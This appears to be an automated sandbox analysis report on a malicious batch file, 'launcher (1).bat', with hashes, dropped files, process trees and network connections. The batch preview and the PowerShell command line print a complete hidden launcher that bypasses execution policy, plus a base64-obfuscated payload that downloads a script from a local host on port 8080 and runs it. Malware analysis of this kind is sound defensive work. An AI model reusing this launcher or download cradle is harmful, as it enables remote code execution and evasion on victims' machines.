Analysis Mode: default
Analysis stop reason: Timeout
Sample name: launcher (1).bat
Detection: MAL
Classification: mal68.evad.winBAT@4/5@0/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 4
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.29.183.29, 52.149.20.212
• Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 8060 because it is empty
• Not all processes were analyzed; the report is missing behavior information
Time | Type | Description
15:48:10 | API Interceptor | 44x Sleep call for process: powershell.exe modified
                          No context

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5: 8A4B02D8A977CB929C05D4BC2942C5A9
SHA1: F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256: 624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512: 38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious: false
Reputation: moderate, very likely benign file
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulbnolz:NllUc
MD5: F23953D4A58E404FCB67ADD0C45EB27A
SHA1: 2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256: 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512: B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious: false
Reputation: high, very likely benign file
                          Preview:@...e................................................@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\cmd.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 43
Entropy (8bit): 4.297675800911845
Encrypted: false
SSDEEP: 3:MbxJsqGCMABeSOL9y:gi9CaL0
MD5: 44DC34D4AD9A6E4D044CB94CE40844F7
SHA1: 2CFDDAA41DA5481618F59DEEC7907856325B384F
SHA-256: D0AE5FE259AF8887552EE9E33F64F045F4349B3BE5078FF0AA061355523FECFF
SHA-512: 4BF7B47CF7D2863D75AD880E03BA642B617182F3F1FE3ACD8F96C55415C4CB62D8CB24C94D4D44ED52270E353358D6C37988E65D7BFF562386C9F5A6099AC42A
Malicious: false
Reputation: moderate, very likely benign file
Preview: No batch label specified to GOTO command...

File type: DOS batch file, ASCII text, with very long lines (1380)
Entropy (8bit): 4.58933657005266
TrID:
File name: launcher (1).bat
File size: 1'526 bytes
MD5: 30626221f424c91a9b503a49c29f2a80
SHA1: ef1aaef2d0993567f67bb4473ac1e44773f9fd8f
SHA256: c65fe988dd48cf30fa0fb559cad98035abc06b753fe39f89c0e15d47e55142b4
SHA512: f46e260c65efe6e0e289d42e5958831d329a4c473a0ef64785e7c0a798b22e3d5f96f90137c0336cbef543fb2a1043e7706a1afb09d297ce9d5c026b664bdf91
SSDEEP: 24:kjWvlw81lemtbLyl3ujdtt9cDxndjJkA/i8iHOrR9YfLEgQ8f8iGw1dsAtAxizcj:391Amt/8uDtqDx1JkOmO268Ux0uAtAx/
TLSH: A631AA78DAA5EDC006EB73E05ED13909602C9913C67157BCB68D0CE7A59C50A9E34AF8
                            File Content Preview:@echo off.set "_1=pow^ers^hell".set "_2=-Win^dow^Style Hidden".set "_3=-NoP -W 1 -EP Bypass -Enc".set "_4=IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgA
Icon Hash: 9686878b929a9886


Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 20, 2025 21:48:12.058361053 CEST | 49689 | 8080 | 192.168.2.5 | 192.168.101.128
Apr 20, 2025 21:48:13.046202898 CEST | 49689 | 8080 | 192.168.2.5 | 192.168.101.128
Apr 20, 2025 21:48:15.046458960 CEST | 49689 | 8080 | 192.168.2.5 | 192.168.101.128
Apr 20, 2025 21:48:19.061974049 CEST | 49689 | 8080 | 192.168.2.5 | 192.168.101.128
Apr 20, 2025 21:48:27.077467918 CEST | 49689 | 8080 | 192.168.2.5 | 192.168.101.128

Target ID: 0
Start time: 15:48:09
Start date: 20/04/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\launcher (1).bat" "
Imagebase: 0x7ff747720000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 1
Start time: 15:48:09
Start date: 20/04/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7e2000000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 15:48:09
Start date: 20/04/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                            Commandline:powershell -WindowStyle Hidden -NoP -W 1 -EP Bypass -Enc IAAgAC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBFACcALAAnAEkAYQBiAGwAJwAsACcAUwBFAHQALQBWAGEAUgAnACkAIAAgACgAJwBUACcAKwAnADMAUwBaAFAAMQAnACkAIAAgACgAIABbAFQAeQBwAGUAXQAoACIAewAwAH0AewAxAH0AewAyAH0AewAzAH0AewA0AH0AIgAtAGYAJwBOACcALAAnAGUAVAAnACwAJwAuAEMAUgBlAGQARQBuAHQASQBhAEwAJwAsACcAYwAnACwAJwBBAEMAaABlACcAKQAgACAAKQAgADsAIAAgACgAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAnAHQAJwAsACcAYwAnACwAJwBOAGUAdwAtAE8AYgBqAGUAJwApACAAKAAiAHsAMgB9AHsAMwB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwB0ACcALAAnAG4AJwAsACcATgBlAHQAJwAsACcALgBXAGUAYgBDAGwAaQBlACcAKQApAC4AIgBQAFIATwBgAFgAeQAiAC4AIgBjAFIAZQBEAGAAZQBOAFQAaQBgAEEAYABsAHMAIgA9ACAAIAAoACAAIAAmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaQB0ACcALAAnAGUATQAnACkAIAAgACgAIgBWAEEAUgBJAEEAYgAiACsAIgBMACIAKwAiAEUAOgBUACIAKwAiADMAcwB6AFAAIgArACIAMQAiACkAIAApAC4AIgB2AGEATABgAFUAZQAiADoAOgAiAGQAYABFAGYAYQBVAEwAdABuAEUAdABXAE8AUgBLAGAAYwBgAFIAZQBgAEQARQBuAHQASQBhAEwAUwAiADsAJgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHIAJwAsACcAaQB3ACcAKQAoACgAIgB7ADIAfQB7ADgAfQB7ADQAfQB7ADkAfQB7ADEAfQB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQAiAC0AZgAnAG8AYQBkAC8AcABvAHcAZQByACcALAAnAC4AMQAyACcALAAnAGgAdAB0AHAAOgAvAC8AJwAsACcAOAA6ADgAMAA4ADAALwAnACwAJwAyACcALAAnAHMAaABlAGwAbAAnACwAJwAvACcALAAnAGQAbwB3AG4AbAAnACwAJwAxADkAJwAsACcALgAxADYAOAAuADEAMAAxACcAKQApAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAfAAmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAJwAsACcAaQBlACcAKQA=
                            Imagebase:0x7ff7785e0000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000002.00000002.1513804752.00007FF7C7F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7F80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7f80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c597d34b5f69201e69446634e1b97f737c40026f7de685ac670a5c0aee9a9a5
                            • Instruction ID: 37fedd027fbb633749b07c0313edbee027991d57ab219bf5d2c2f8f6f7959aa6
                            • Opcode Fuzzy Hash: 9c597d34b5f69201e69446634e1b97f737c40026f7de685ac670a5c0aee9a9a5
                            • Instruction Fuzzy Hash: 85C13832E0DA894FE795EF6848956B9BBE1FF46320B4401BED05DD7183DE18A80783A1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1513804752.00007FF7C7F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7F80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7f80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3cbcb7912bbfe3a2cd8a947478b2d7e04bbea94bd5aacb7c01b65e4e66b720f7
                            • Instruction ID: 2c2c7d1b20e71d9abd77bf7a619e7feec377f23b85c220001622ef3b4c0735f2
                            • Opcode Fuzzy Hash: 3cbcb7912bbfe3a2cd8a947478b2d7e04bbea94bd5aacb7c01b65e4e66b720f7
                            • Instruction Fuzzy Hash: C0911622E0DA8D5FEB95BF7958942B9BBE0FF56360B4402BED40DD3193DE18A8078351
                            Memory Dump Source
                            • Source File: 00000002.00000002.1513804752.00007FF7C7F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7F80000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7f80000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f8825371ee28fc37961789cb3b90b3592f920e5c9c5add3e16d3d29fe62fb70
                            • Instruction ID: 35b96886ce6a0d6b1d0fc23c33f8ff6cdc3f5a8bbe9934a5bafba90bbec7b7f2
                            • Opcode Fuzzy Hash: 9f8825371ee28fc37961789cb3b90b3592f920e5c9c5add3e16d3d29fe62fb70
                            • Instruction Fuzzy Hash: D531C522E0EA865BF7A9BB3818D51B8A6D0EF563B1B9802BED00DD35D3DD0C68474311
                            Memory Dump Source
                            • Source File: 00000002.00000002.1513528100.00007FF7C7EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C7EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff7c7eb0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                            • Instruction ID: 7c318363844ad206bb3b7ce3fb40bdce3430cf4cff51a124de02c30edd0e63ce
                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                            • Instruction Fuzzy Hash: 0A01A77110CB0C8FD744EF0CE491AA6B7E0FB85360F50052DE58AC3651DA36E882CB45